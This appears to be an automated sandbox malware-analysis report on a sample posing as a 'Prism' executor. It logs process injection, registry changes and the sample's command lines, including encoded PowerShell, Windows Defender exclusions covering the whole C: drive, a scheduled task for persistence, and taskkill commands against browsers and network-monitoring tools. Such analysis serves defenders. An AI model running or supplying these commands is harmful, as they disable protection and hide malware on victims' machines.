Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows Runtime.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows Runtime.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 948 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 948 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 948 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 948 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 3116 wrote to memory of 2564 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe
PID 3116 wrote to memory of 2564 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe
PID 4492 wrote to memory of 4276 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 4276 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 436 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 436 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 3528 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 3528 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 2756 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 2756 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 1188 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe
PID 4492 wrote to memory of 1188 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe
PID 4492 wrote to memory of 1220 N/A C:\Users\Admin\dllhost.exe C:\Users\Admin\AppData\Local\Temp\cffckp.exe
PID 4492 wrote to memory of 1220 N/A C:\Users\Admin\dllhost.exe C:\Users\Admin\AppData\Local\Temp\cffckp.exe
PID 1220 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\cffckp.exe C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe
PID 1220 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\cffckp.exe C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe
PID 800 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 800 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 800 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe
PID 800 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe
PID 800 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 800 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5040 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 2760 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2760 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 5040 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 464 wrote to memory of 4284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 464 wrote to memory of 4284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 5040 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 4380 wrote to memory of 3380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4380 wrote to memory of 3380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 5040 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\Conhost.exe
PID 5040 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\Conhost.exe
PID 2196 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2196 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 800 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 800 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\Conhost.exe
PID 5040 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\Conhost.exe
PID 932 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 932 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 2832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 2832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 800 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 800 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\Conhost.exe
PID 5040 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\Conhost.exe
PID 2560 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2560 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe

"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="

C:\Users\Admin\dllhost.exe

"C:\Users\Admin\dllhost.exe"

C:\Users\Admin\Prism Executor.exe

"C:\Users\Admin\Prism Executor.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe

"C:\Users\Admin\Prism Executor.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"

C:\ProgramData\Windows Runtime.exe

"C:\ProgramData\Windows Runtime.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4156 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\cffckp.exe

"C:\Users\Admin\AppData\Local\Temp\cffckp.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\cffckp.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\ProgramData\Windows Runtime.exe

"C:\ProgramData\Windows Runtime.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe" "--multiprocessing-fork" "parent_pid=800" "pipe_handle=824"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath \"C:\\\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

